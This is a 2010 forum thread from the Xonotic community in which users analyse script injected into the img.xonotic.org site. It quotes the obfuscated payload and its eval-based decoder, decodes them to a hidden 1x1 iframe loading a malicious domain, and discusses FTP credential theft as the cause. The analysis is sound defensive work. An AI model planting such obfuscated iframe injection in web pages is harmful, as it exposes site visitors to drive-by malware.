+- Xonotic Forums (https://forums.xonotic.org)
+-- Forum: Community (https://forums.xonotic.org/forumdisplay.php?fid=6)
+--- Forum: Off Topic (https://forums.xonotic.org/forumdisplay.php?fid=15)
+--- Thread: img.xonotic.org Infected again (/showthread.php?tid=931)
img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-04-2010
Looks like img.xonotic.org is infected again
There is code on the top of the page that is pointing to a malicious URL.
RE: img.xonotic.org Infected again - clanclanclan - 09-04-2010
On the topic of img.xonotic.org, what on earth is
Code:
<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>That might be what's causing it.
RE: img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-04-2010
(09-04-2010, 06:44 PM)clanclanclan Wrote: On the topic of img.xonotic.org, what on earth is
Code:<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh="x3tnshrm4luytnshrm1" heitnshrmx34lutnshrmyghtnshrmt="1xtnshrm34luytnshrm" bortnshrmdx34tnshrmluytnshrmer="tnshrm0" xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm="0xtnshrm34ltnshrmuy" srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluyx34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm>
That might be what's causing it.
Replace All "tnshrm" with nothing and then
Replace All "x34luy" with nothing you get :
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')I suspect that someone that has ftp access to img.xonotic.org has ftp password stealing malware on their pc.
I came across this recently where malware steals stored ftp credentials and uses it to infect websites.
RE: img.xonotic.org Infected again - clanclanclan - 09-05-2010
http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/
Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.
RE: img.xonotic.org Infected again - Minkovsky - 09-05-2010
(09-05-2010, 12:45 AM)clanclanclan Wrote: http://www.malwaredomainlist.com/mdl.php, look at the "workgroupsite.com" entry. Definitely malware :/
Edit: Wgetted the site (didn't visit it so I don't know what it does to browsers) and it looks like/is a clone of Google.
Run a dummy XP virtual machine (best on a computer you don't mind formatting afterwards, if sandboxing fails) if you want to see more. I've seen people on youtube doing this to show fake AVs and other bad stuff. Why XP? A lot of viruses is targeting that system.
RE: img.xonotic.org Infected again - PinkRobot - 09-05-2010
Also: maybe the person who is causing this problem is using the very popular free FTP program FileZilla and stores the passwords in the program (by adding the site in the Site Manager). FileZilla appears to be vulnerable to certain malware being able read the contents of the password file and sending it to someone else, who then sells the passes to people who do stuff like the above. The safest way to use FileZilla on Windows, but maybe also other platforms, is to not store the passwords, but to use Quick Connect. It's a little more work, but much safer.
RE: img.xonotic.org Infected again - rainerzufalldererste - 09-05-2010
Code:
<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S
Code:
// marked is the following
xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm
x3tnshrm4luytnshrm1
1xtnshrm34luytnshrm
tnshrm0
0xtnshrm34ltnshrmuy
"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"
ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrmthe parts
Code:
x3tnshrm4luytnshrm1and
Code:
1xtnshrm34luytnshrm..//\\
//||\\
...||
...||
INFECTED!?
RE: img.xonotic.org Infected again - Silica Gel: Do Not Eat - 09-05-2010
(09-05-2010, 12:02 PM)rainerzufalldererste Wrote:Code:<div style='visibility:hidden;' id='j3ak74yf'>xtnshrm34ltnshrmuydoctnshrmumx34tnshrmluyentnshrmtx34ltnshrmuy.tnshrmwritnshrmx34tnshrmluytetnshrm('<xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm x34tnshrmluywitnshrmdx34tnshrmluyttnshrmh=x3tnshrm4luytnshrm1 heitnshrmx34lutnshrmyghtnshrmt=1xtnshrm34luytnshrm bortnshrmdx34tnshrmluytnshrmer=tnshrm0 xtnshrm34lutnshrmyfratnshrmmx34ltnshrmuyetnshrmbortnshrmdx34ltnshrmuyertnshrm=0xtnshrm34ltnshrmuy srtnshrmx34tnshrmluytnshrmc="httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp">tnshrmx34tnshrmluy</ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm>x34ltnshrmuy')tnshrm;x3tnshrm4luytnshrm</div>
...doesn't seem to be named like this by a company or admin!
...it looks like it's repeating itself :S
Code:// marked is the following
xtnshrm34ltnshrmuyiftnshrmraxtnshrm34ltnshrmuymetnshrm
x3tnshrm4luytnshrm1
1xtnshrm34luytnshrm
tnshrm0
0xtnshrm34ltnshrmuy
"httnshrmx34tnshrmluytptnshrm:/xtnshrm34ltnshrmuy/tnshrmworx3tnshrm4luyktnshrmgroxtnshrm34lutnshrmyupstnshrmx34lutnshrmyittnshrme.x34tnshrmluycotnshrmm/2xtnshrm34luytnshrmtx/xtnshrm34ltnshrmuyitnshrmndex3tnshrm4luytnshrmx.px3tnshrm4luytnshrmhp"
ixtnshrm34ltnshrmuyfratnshrmx34lutnshrmymetnshrm
the parts
Code:x3tnshrm4luytnshrm1
and
seem to repeat themselves perfectly with only some letters position changed!Code:1xtnshrm34luytnshrm
..//\\
//||\\
...||
...||
INFECTED!?
The following code replaces "tnshrm" with nothing
and then "x34luy" with nothing.
Code:
var xsry8w5 = $('div#j3ak74yf').html().replace(/tnshrm/g, '');
var Rtmbpm0 = eval(String.fromCharCode(215-114,614-496,518-421,597-489));
Rtmbpm0(xsry8w5.replace(/x34luy/g, ''));Which results in
Code:
document.write('<iframe width=1 height=1 border=0 frameborder=0 src="http://workgroupsite.com/2tx/index.php"></iframe>')